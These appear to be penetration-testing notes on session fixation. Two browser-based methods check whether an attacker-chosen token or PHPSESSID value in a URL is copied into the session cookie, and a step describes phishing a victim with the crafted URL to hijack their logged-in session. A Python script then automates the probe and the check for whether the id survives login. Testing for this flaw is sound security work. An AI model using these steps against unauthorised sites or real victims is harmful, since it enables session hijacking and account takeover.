DISCOVERY
METHOD 1:
#step 1:
root@oco:~$ BROWSER > {targetSite:port}/?redirect_uri=/complete.html&token=cjrk6aa7ricu100dm8fa2mrkhe > F12 > Storage > Cookies
{targetSite:port}
Name: PHPSESSID
Value: cjrk6aa7ricu100dm8fa2mrkhe
* URL parameters are added once the site is visited: {targetSite:port}/?redirect_uri=/complete.html&token=cjrk6aa7ricu100dm8fa2mrkhe
- the application uses a session cookie named PHPSESSID, and the cookie's value is identical to the value of the token parameter in the URL
- If an arbitrary value (or a valid session identifier) supplied in the token parameter is copied into the PHPSESSID cookie, the application may be vulnerable to session fixation.
#step 2: exploitation
root@oco:~$ BROWSER > New Private Window > http://{targetSite:port}/?redirect_uri=/complete.html&token=attackerControlledCookie > F12 > Storage > Cookies
Name: PHPSESSID
Value: attackerControlledCookie
* if token={arbitraryValue} from the URL is propagated to the PHPSESSID cookie, the vulnerability is confirmed (a fresh private window ensures no pre-existing cookie masks the result)
#step 3: send a URL similar to the above to a victim (phishing).
#If the victim logs into the application and the application does not regenerate the session identifier
#on authentication, the attacker can hijack the victim's session since the identifier is already known (the attacker fixated it).
METHOD 2:
#step 1: put the session cookie's name and a chosen value in the URL as a query parameter, then refresh
root@oco:~$ BROWSER > http://insecure.exampleapp.com/login?PHPSESSID=AttackerSpecifiedCookieValue
#step 2: in a fresh session, check whether the value supplied in the URL is propagated to the PHPSESSID cookie
root@oco:~$ BROWSER > New Private Window > http://{targetSite:port}/login?PHPSESSID=AttackerSpecifiedCookieValue > F12 > Storage > Cookies
Name: PHPSESSID
Value: AttackerSpecifiedCookieValue
* if the PHPSESSID value from the URL is propagated to the cookie, the vulnerability is confirmed; continue with step 3 of METHOD 1 (deliver the URL to the victim)
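Both methods above reduce to the same check: send a probe URL carrying a value of our choosing, read the Set-Cookie headers, and see whether the session cookie was assigned exactly that value. The script below is an added example (not part of the original notes) that automates both probe URLs with Python's standard library and also models step 3 (does the fixated id survive login?). The host name, the /login path and the probe value are assumptions taken from the placeholders in the notes, and the sample Set-Cookie headers are constructed, not captured from any target.

```python
"""Session fixation probe: do attacker-supplied values end up in PHPSESSID?"""
from http.cookies import SimpleCookie
from urllib.parse import urlencode, urlsplit, urlunsplit
import urllib.error
import urllib.request

SESSION_COOKIE = "PHPSESSID"              # cookie name observed in the notes
PROBE_VALUE = "attackerControlledCookie"  # arbitrary value we try to fixate


def build_probe_urls(base_url, value=PROBE_VALUE):
    """Probe URLs for both methods in the notes.

    token_param:   /?redirect_uri=/complete.html&token=<value>  (METHOD 1)
    cookie_in_url: /login?PHPSESSID=<value>                     (METHOD 2)
    """
    parts = urlsplit(base_url)

    def with_query(path, params):
        # safe="/" keeps redirect_uri readable, as in the notes
        return urlunsplit((parts.scheme, parts.netloc, path, urlencode(params, safe="/"), ""))

    return {
        "token_param": with_query("/", [("redirect_uri", "/complete.html"), ("token", value)]),
        "cookie_in_url": with_query("/login", [(SESSION_COOKIE, value)]),
    }


def fixated_value(set_cookie_headers, cookie_name=SESSION_COOKIE):
    """Value the response assigned to cookie_name, or None if it set none.

    A response may carry several Set-Cookie headers; the last assignment
    wins, which is also what the browser ends up storing.
    """
    value = None
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        if cookie_name in jar:
            value = jar[cookie_name].value
    return value


def is_fixation_candidate(set_cookie_headers, probe=PROBE_VALUE, cookie_name=SESSION_COOKIE):
    """True when the session cookie was set to the exact value we supplied."""
    return fixated_value(set_cookie_headers, cookie_name) == probe


def survives_login(pre_login_id, post_login_headers, cookie_name=SESSION_COOKIE):
    """Step 3 of METHOD 1: the fixated id only helps the attacker if the
    application keeps it across authentication. No new Set-Cookie means the
    old id is kept; a different value means the id was regenerated."""
    new_id = fixated_value(post_login_headers, cookie_name)
    return new_id is None or new_id == pre_login_id


def probe(base_url, method="token_param", timeout=10):
    """Live version of the check against a target you are authorised to test.
    No cookie jar is used, so the server cannot see a prior session, and
    redirects are not followed so we read the first response's cookies."""
    url = build_probe_urls(base_url)[method]

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # makes urllib raise HTTPError for 3xx instead of following

    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx still carry headers
        resp = err
    headers = resp.headers.get_all("Set-Cookie") or []
    return {"url": url, "set_cookie": headers, "propagated": is_fixation_candidate(headers)}


# Constructed sample responses (not captured from any real target).
VULNERABLE_HEADERS = ["PHPSESSID=attackerControlledCookie; path=/; HttpOnly"]
ROTATED_HEADERS = ["PHPSESSID=7d2b5f0e19c4a83b6e1f0d9c2a5b4e7f; path=/; HttpOnly"]

if __name__ == "__main__":
    for name, url in build_probe_urls("http://target.example:8080").items():
        print(name, url)
    print("value propagated:", is_fixation_candidate(VULNERABLE_HEADERS))
    print("id survives login:", survives_login(PROBE_VALUE, []))
```

Usage: run the module as-is to see the two probe URLs and the checks against the constructed headers, or call probe("http://{targetSite:port}", "cookie_in_url") against a host you are allowed to test. A positive is_fixation_candidate result corresponds to step 2 of either method; survives_login is what decides whether step 3 actually pays off, since an application that regenerates the session id at login is not exploitable this way even if the cookie is attacker-controlled before authentication.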